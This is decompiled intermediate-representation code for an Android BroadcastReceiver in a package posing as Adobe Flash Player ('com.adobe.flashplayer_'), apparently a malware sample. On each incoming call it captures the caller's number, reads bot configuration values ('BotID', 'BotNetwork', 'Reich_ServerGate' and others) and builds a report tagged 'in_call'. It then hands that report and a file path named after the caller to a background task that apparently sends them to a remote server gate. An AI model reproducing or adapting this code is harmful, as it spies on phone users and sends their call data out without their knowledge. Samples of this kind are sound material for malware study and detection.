record `com.adobe.flashplayer_.FlashY` @kind class @AccessFlag PUBLIC extends `android.content.BroadcastReceiver` @kind class {
}
procedure `void` `<init>`(`com.adobe.flashplayer_.FlashY` v0 @kind this) @signature `Lcom/adobe/flashplayer_/FlashY;.<init>:()V` @AccessFlag PUBLIC_CONSTRUCTOR {
    temp;

  #L03655c.  call `<init>`(v0) @signature `Landroid/content/BroadcastReceiver;.<init>:()V` @kind direct;
  #L036562.  return @kind void;
}
procedure `java.lang.String` `readConfig`(`com.adobe.flashplayer_.FlashY` v7 @kind this, `java.lang.String` v8 @kind object @name `config`, `android.content.Context` v9 @kind object @name `context`) @signature `Lcom/adobe/flashplayer_/FlashY;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @AccessFlag PRIVATE {
    temp;
    v0;
    v1;
    v2;
    v3;
    v4;
    v5;
    v6;

  #L036574.  v4:= "" @kind object;
  #L036578.  call temp:= `openFileInput`(v9, v8) @signature `Landroid/content/Context;.openFileInput:(Ljava/lang/String;)Ljava/io/FileInputStream;` @kind virtual;
  #L03657e.  v1:= temp @kind object;
  #L036580.  if v1 == 0 then goto L0365c0;
  #L036584.  v2:= new `java.io.InputStreamReader`;
  #L036588.  call `<init>`(v2, v1) @signature `Ljava/io/InputStreamReader;.<init>:(Ljava/io/InputStream;)V` @kind direct;
  #L03658e.  v0:= new `java.io.BufferedReader`;
  #L036592.  call `<init>`(v0, v2) @signature `Ljava/io/BufferedReader;.<init>:(Ljava/io/Reader;)V` @kind direct;
  #L036598.  v3:= "" @kind object;
  #L03659c.  v5:= new `java.lang.StringBuilder`;
  #L0365a0.  call `<init>`(v5) @signature `Ljava/lang/StringBuilder;.<init>:()V` @kind direct;
  #L0365a6.  call temp:= `readLine`(v0) @signature `Ljava/io/BufferedReader;.readLine:()Ljava/lang/String;` @kind virtual;
  #L0365ac.  v3:= temp @kind object;
  #L0365ae.  if v3 != 0 then goto L0365c2;
  #L0365b2.  call `close`(v1) @signature `Ljava/io/InputStream;.close:()V` @kind virtual;
  #L0365b8.  call temp:= `toString`(v5) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L0365be.  v4:= temp @kind object;
  #L0365c0.  return v4 @kind object;
  #L0365c2.  call temp:= `append`(v5, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0365c8.  goto L0365a6;
  #L0365ca.  v6:= Exception @type ^`java.io.FileNotFoundException` @kind object;
  #L0365cc.  goto L0365c0;
  #L0365ce.  v6:= Exception @type ^`java.io.IOException` @kind object;
  #L0365d0.  goto L0365c0;
  catch `java.io.FileNotFoundException` @[L036578..L0365c8] goto L0365ca;
  catch `java.io.IOException` @[L036578..L0365c8] goto L0365ce;
}
procedure `void` `saveData`(`com.adobe.flashplayer_.FlashY` v2 @kind this, `java.lang.String` v3 @kind object @name `data`, `java.lang.String` v4 @kind object @name `f`, `android.content.Context` v5 @kind object @name `context`) @signature `Lcom/adobe/flashplayer_/FlashY;.saveData:(Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V` @AccessFlag PRIVATE {
    temp;
    v0;
    v1;

  #L0365f4.  v0:= new `java.io.OutputStreamWriter`;
  #L0365f8.  v1:= 0I;
  #L0365fa.  call temp:= `openFileOutput`(v5, v4, v1) @signature `Landroid/content/Context;.openFileOutput:(Ljava/lang/String;I)Ljava/io/FileOutputStream;` @kind virtual;
  #L036600.  v1:= temp @kind object;
  #L036602.  call `<init>`(v0, v1) @signature `Ljava/io/OutputStreamWriter;.<init>:(Ljava/io/OutputStream;)V` @kind direct;
  #L036608.  call `write`(v0, v3) @signature `Ljava/io/OutputStreamWriter;.write:(Ljava/lang/String;)V` @kind virtual;
  #L03660e.  call `close`(v0) @signature `Ljava/io/OutputStreamWriter;.close:()V` @kind virtual;
  #L036614.  return @kind void;
  #L036616.  v1:= Exception @type ^`java.io.IOException` @kind object;
  #L036618.  goto L036614;
  catch `java.io.IOException` @[L0365f4..L036614] goto L036616;
}
procedure `void` `onReceive`(`com.adobe.flashplayer_.FlashY` v20 @kind this, `android.content.Context` v21 @kind object @name `context`, `android.content.Intent` v22 @kind object @name `intent`) @signature `Lcom/adobe/flashplayer_/FlashY;.onReceive:(Landroid/content/Context;Landroid/content/Intent;)V` @AccessFlag PUBLIC {
    temp;
    v0;
    v1;
    v2;
    v3;
    v4;
    v5;
    v6;
    v7;
    v8;
    v9;
    v10;
    v11;
    v12;
    v13;
    v14;
    v15;
    v16;
    v17;
    v18;
    v19;

  #L03663c.  v11:= 0I;
  #L03663e.  v14:= "incoming_number" @kind object;
  #L036642.  v0:= v22 @kind object;
  #L036646.  call temp:= `getStringExtra`(v0, v14) @signature `Landroid/content/Intent;.getStringExtra:(Ljava/lang/String;)Ljava/lang/String;` @kind virtual;
  #L03664c.  v12:= temp @kind object;
  #L03664e.  if v12 == 0 then goto L03683a;
  #L036652.  if v11 != 0 then goto L03683a;
  #L036656.  v11:= 1I;
  #L036658.  v14:= "+" @kind object;
  #L03665c.  v15:= "" @kind object;
  #L036660.  call temp:= `replace`(v12, v14, v15) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L036666.  v12:= temp @kind object;
  #L036668.  v9:= "" @kind object;
  #L03666c.  v14:= "connectivity" @kind object;
  #L036670.  v0:= v21 @kind object;
  #L036674.  call temp:= `getSystemService`(v0, v14) @signature `Landroid/content/Context;.getSystemService:(Ljava/lang/String;)Ljava/lang/Object;` @kind virtual;
  #L03667a.  v10:= temp @kind object;
  #L03667c.  v10:= (`android.net.ConnectivityManager`) v10 @kind object;
  #L036680.  call temp:= `getActiveNetworkInfo`(v10) @signature `Landroid/net/ConnectivityManager;.getActiveNetworkInfo:()Landroid/net/NetworkInfo;` @kind virtual;
  #L036686.  v13:= temp @kind object;
  #L036688.  v14:= "BotID" @kind object;
  #L03668c.  v0:= v20 @kind object;
  #L036690.  v1:= v21 @kind object;
  #L036694.  call temp:= `readConfig`(v0, v14, v1) @signature `Lcom/adobe/flashplayer_/FlashY;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L03669a.  v3:= temp @kind object;
  #L03669c.  v14:= "BotNetwork" @kind object;
  #L0366a0.  v0:= v20 @kind object;
  #L0366a4.  v1:= v21 @kind object;
  #L0366a8.  call temp:= `readConfig`(v0, v14, v1) @signature `Lcom/adobe/flashplayer_/FlashY;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L0366ae.  v5:= temp @kind object;
  #L0366b0.  v14:= "BotLocation" @kind object;
  #L0366b4.  v0:= v20 @kind object;
  #L0366b8.  v1:= v21 @kind object;
  #L0366bc.  call temp:= `readConfig`(v0, v14, v1) @signature `Lcom/adobe/flashplayer_/FlashY;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L0366c2.  v4:= temp @kind object;
  #L0366c4.  v14:= "Reich_ServerGate" @kind object;
  #L0366c8.  v0:= v20 @kind object;
  #L0366cc.  v1:= v21 @kind object;
  #L0366d0.  call temp:= `readConfig`(v0, v14, v1) @signature `Lcom/adobe/flashplayer_/FlashY;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L0366d6.  v8:= temp @kind object;
  #L0366d8.  v14:= "BotVer" @kind object;
  #L0366dc.  v0:= v20 @kind object;
  #L0366e0.  v1:= v21 @kind object;
  #L0366e4.  call temp:= `readConfig`(v0, v14, v1) @signature `Lcom/adobe/flashplayer_/FlashY;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L0366ea.  v6:= temp @kind object;
  #L0366ec.  v7:= `@@android.os.Build$VERSION.RELEASE` @type ^`java.lang.String` @kind object;
  #L0366f0.  v14:= "incoming_number" @kind object;
  #L0366f4.  v0:= v22 @kind object;
  #L0366f8.  call temp:= `getStringExtra`(v0, v14) @signature `Landroid/content/Intent;.getStringExtra:(Ljava/lang/String;)Ljava/lang/String;` @kind virtual;
  #L0366fe.  v9:= temp @kind object;
  #L036700.  v0:= v20 @kind object;
  #L036704.  v1:= v21 @kind object;
  #L036708.  call `saveData`(v0, v9, v12, v1) @signature `Lcom/adobe/flashplayer_/FlashY;.saveData:(Ljava/lang/String;Ljava/lang/String;Landroid/content/Context;)V` @kind direct;
  #L03670e.  if v13 == 0 then goto L03683a;
  #L036712.  call temp:= `isConnectedOrConnecting`(v13) @signature `Landroid/net/NetworkInfo;.isConnectedOrConnecting:()Z` @kind virtual;
  #L036718.  v14:= temp;
  #L03671a.  if v14 == 0 then goto L03683a;
  #L03671e.  v14:= new `com.adobe.flashplayer_.FlashVirtual`;
  #L036722.  call `<init>`(v14) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.<init>:()V` @kind direct;
  #L036728.  v15:= 3I;
  #L03672a.  v15:= new `java.lang.String`[v15];
  #L03672e.  v16:= 0I;
  #L036732.  v17:= new `java.lang.StringBuilder`;
  #L036736.  v18:= "&b=" @kind object;
  #L03673a.  call `<init>`(v17, v18) @signature `Ljava/lang/StringBuilder;.<init>:(Ljava/lang/String;)V` @kind direct;
  #L036740.  v0:= v17 @kind object;
  #L036744.  call temp:= `append`(v0, v3) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03674a.  v17:= temp @kind object;
  #L03674c.  v18:= "&c=" @kind object;
  #L036750.  call temp:= `append`(v17, v18) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036756.  v17:= temp @kind object;
  #L036758.  v18:= ":" @kind object;
  #L03675c.  v19:= "" @kind object;
  #L036760.  v0:= v18 @kind object;
  #L036764.  v1:= v19 @kind object;
  #L036768.  call temp:= `replace`(v5, v0, v1) @signature `Ljava/lang/String;.replace:(Ljava/lang/CharSequence;Ljava/lang/CharSequence;)Ljava/lang/String;` @kind virtual;
  #L03676e.  v18:= temp @kind object;
  #L036770.  call temp:= `append`(v17, v18) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036776.  v17:= temp @kind object;
  #L036778.  v18:= "&d=" @kind object;
  #L03677c.  call temp:= `append`(v17, v18) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036782.  v17:= temp @kind object;
  #L036784.  v0:= v17 @kind object;
  #L036788.  call temp:= `append`(v0, v4) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03678e.  v17:= temp @kind object;
  #L036790.  v18:= "&e=" @kind object;
  #L036794.  call temp:= `append`(v17, v18) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L03679a.  v17:= temp @kind object;
  #L03679c.  v18:= "BotPhone" @kind object;
  #L0367a0.  v0:= v20 @kind object;
  #L0367a4.  v1:= v18 @kind object;
  #L0367a8.  v2:= v21 @kind object;
  #L0367ac.  call temp:= `readConfig`(v0, v1, v2) @signature `Lcom/adobe/flashplayer_/FlashY;.readConfig:(Ljava/lang/String;Landroid/content/Context;)Ljava/lang/String;` @kind direct;
  #L0367b2.  v18:= temp @kind object;
  #L0367b4.  call temp:= `append`(v17, v18) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0367ba.  v17:= temp @kind object;
  #L0367bc.  v18:= "&f=" @kind object;
  #L0367c0.  call temp:= `append`(v17, v18) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0367c6.  v17:= temp @kind object;
  #L0367c8.  v0:= v17 @kind object;
  #L0367cc.  call temp:= `append`(v0, v6) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0367d2.  v17:= temp @kind object;
  #L0367d4.  v18:= "&g=" @kind object;
  #L0367d8.  call temp:= `append`(v17, v18) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0367de.  v17:= temp @kind object;
  #L0367e0.  v0:= v17 @kind object;
  #L0367e4.  call temp:= `append`(v0, v7) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0367ea.  v17:= temp @kind object;
  #L0367ec.  v18:= "&h=in_call&i=" @kind object;
  #L0367f0.  call temp:= `append`(v17, v18) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L0367f6.  v17:= temp @kind object;
  #L0367f8.  v0:= v17 @kind object;
  #L0367fc.  call temp:= `append`(v0, v12) @signature `Ljava/lang/StringBuilder;.append:(Ljava/lang/String;)Ljava/lang/StringBuilder;` @kind virtual;
  #L036802.  v17:= temp @kind object;
  #L036804.  call temp:= `toString`(v17) @signature `Ljava/lang/StringBuilder;.toString:()Ljava/lang/String;` @kind virtual;
  #L03680a.  v17:= temp @kind object;
  #L03680c.  v15[v16]:= v17 @kind object;
  #L036810.  v16:= 1I;
  #L036814.  v0:= v21 @kind object;
  #L036818.  call temp:= `getFileStreamPath`(v0, v12) @signature `Landroid/content/Context;.getFileStreamPath:(Ljava/lang/String;)Ljava/io/File;` @kind virtual;
  #L03681e.  v17:= temp @kind object;
  #L036820.  call temp:= `toString`(v17) @signature `Ljava/io/File;.toString:()Ljava/lang/String;` @kind virtual;
  #L036826.  v17:= temp @kind object;
  #L036828.  v15[v16]:= v17 @kind object;
  #L03682c.  v16:= 2I;
  #L036830.  v15[v16]:= v8 @kind object;
  #L036834.  call temp:= `execute`(v14, v15) @signature `Lcom/adobe/flashplayer_/FlashVirtual;.execute:([Ljava/lang/Object;)Landroid/os/AsyncTask;` @kind virtual;
  #L03683a.  if v12 != 0 then goto L036848;
  #L03683e.  if v11 != 0 then goto L036848;
  #L036842.  v11:= 1I;
  #L036844.  v12:= "REC" @kind object;
  #L036848.  return @kind void;
}
